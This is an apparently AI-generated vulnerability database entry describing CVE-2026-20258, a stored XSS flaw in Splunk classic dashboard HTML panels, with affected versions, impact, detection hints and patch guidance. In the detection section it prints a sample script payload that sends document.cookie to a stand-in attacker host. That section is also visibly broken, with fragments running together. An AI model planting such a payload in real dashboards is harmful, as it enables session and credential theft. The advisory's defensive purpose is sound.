
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-20258 is a stored cross-site scripting (XSS) vulnerability in Splunk Enterprise and Splunk Cloud Platform affecting classic dashboard HTML panels. A low-privileged user without the "admin" or "power" Splunk roles can inject malicious JavaScript into an HTML panel of a classic dashboard, which then executes in the browser of any other user who views that dashboard. Affected Splunk Enterprise versions include those below 10.2.4, 10.0.7, 9.4.12, and 9.3.13; affected Splunk Cloud Platform versions include those below 10.3.2512.11, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132. The vulnerability was disclosed on June 10, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) per NVD, though ENISA rates it 7.1 (High) (Splunk Advisory, GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. Splunk's classic dashboard feature allows users to embed raw HTML in dashboard panels; insufficient sanitization of this input permits a low-privileged attacker to store arbitrary JavaScript that is later rendered in other users' browsers. Exploitation requires a social engineering (phishing) component — the attacker must trick a victim into navigating to or initiating a request that loads the malicious dashboard — meaning the attacker cannot trigger execution at will. No public proof-of-concept code has been identified at this time (Splunk Advisory, GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser context of any Splunk user who views the compromised dashboard, potentially enabling session token theft, credential harvesting, unauthorized actions performed on behalf of the victim, and modification of dashboard data. Because Splunk is commonly used as a SIEM and security operations platform, session hijacking could grant attackers access to sensitive log data, security alerts, and operational dashboards. The confidentiality and integrity of data accessible to the victim user are at risk, though availability is not directly impacted (Splunk Advisory, GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script>) in the panel's HTML source._audit index) showing dashboard edits by low-privileged users, particularly modifications to HTML panel content; access logs showing unexpected requests to attacker-controlled external domains originating from Splunk users' browsers.<script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded JavaScript (e.g., <script>) within HTML panel definitions.Splunk has released patched versions addressing this vulnerability. For Splunk Enterprise, upgrade to version 10.2.4, 10.0.7, 9.4.12, or 9.3.13 or later. For Splunk Cloud Platform, upgrade to version 10.3.2512.11, 10.2.2510.15, 10.1.2507.23, or 9.3.2411.132 or later. As interim mitigations, administrators should restrict dashboard creation and modification permissions to trusted users only, and audit existing classic dashboards for suspicious HTML panel content containing script tags or JavaScript event handlers (Splunk Advisory).
Security news outlets including CyberSecurityNews and SecurityOnline covered the June 2026 Splunk advisory batch, noting CVE-2026-20258 alongside more critical vulnerabilities such as CVE-2026-20253 (a CVSS 9.8 RCE). The XSS vulnerability received comparatively less attention given its medium severity and exploitation prerequisites. Threat intelligence digests from F5 Labs and Hawk-Eye included it in weekly roundups of notable Splunk vulnerabilities disclosed in June 2026 (F5 Weekly Bulletin, SecurityOnline).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."